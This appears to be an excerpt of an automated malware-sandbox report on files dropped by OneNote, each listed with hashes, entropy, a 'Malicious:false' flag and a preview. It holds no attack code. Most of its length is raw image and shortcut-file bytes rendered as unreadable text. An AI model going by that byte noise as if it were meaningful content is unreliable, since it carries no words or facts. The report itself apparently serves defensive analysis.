                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):49224
                                                                                                                                                                                                                  Entropy (8bit):7.402134460714453
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                                                                                                                                  MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                                                                                                                                  SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                                                                                                                                  SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                                                                                                                                  SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3873
                                                                                                                                                                                                                  Entropy (8bit):3.480059300808215
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:K8OZdO5SWDtIFibqzqgdCDDGTCD9zpd5OZdO5SWDth7+5DGqzWk7dCDGWG5CDLE9:x/DytqfGUzpF/DmLZhkEs4
                                                                                                                                                                                                                  MD5:A37390DE538BBFA347AB58304D896ECD
                                                                                                                                                                                                                  SHA1:9CEA2C28E8F290988199A6F38D3D18D03C65E8C7
                                                                                                                                                                                                                  SHA-256:C200A624A3753DF112B5B317F06724DE74C1972B54A404178355F0F5B3DB191D
                                                                                                                                                                                                                  SHA-512:B482DBADEA7847B3F6B44609085D36DA4436BD9C7E0EA646536985790BF5C3C5765A4D84FE8F675CDC6C5BEA76B2C5D5D4C51CFC1641FA619181A950D6BDCB6B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...................................FL..................F.@.. .....Q{......i.[....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U4m..PROGRA~2.........L.tV.U....................V......<R.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......PlP..MICROS~1..R.......PMPtV.U.....z....................C...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P8R..Office16..B.......PMPtV.U.....z........................O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..tV.U....3.........................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3873
                                                                                                                                                                                                                  Entropy (8bit):3.480059300808215
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:K8OZdO5SWDtIFibqzqgdCDDGTCD9zpd5OZdO5SWDth7+5DGqzWk7dCDGWG5CDLE9:x/DytqfGUzpF/DmLZhkEs4
                                                                                                                                                                                                                  MD5:A37390DE538BBFA347AB58304D896ECD
                                                                                                                                                                                                                  SHA1:9CEA2C28E8F290988199A6F38D3D18D03C65E8C7
                                                                                                                                                                                                                  SHA-256:C200A624A3753DF112B5B317F06724DE74C1972B54A404178355F0F5B3DB191D
                                                                                                                                                                                                                  SHA-512:B482DBADEA7847B3F6B44609085D36DA4436BD9C7E0EA646536985790BF5C3C5765A4D84FE8F675CDC6C5BEA76B2C5D5D4C51CFC1641FA619181A950D6BDCB6B
                                                                                                                                                                                                                  Malicious:false
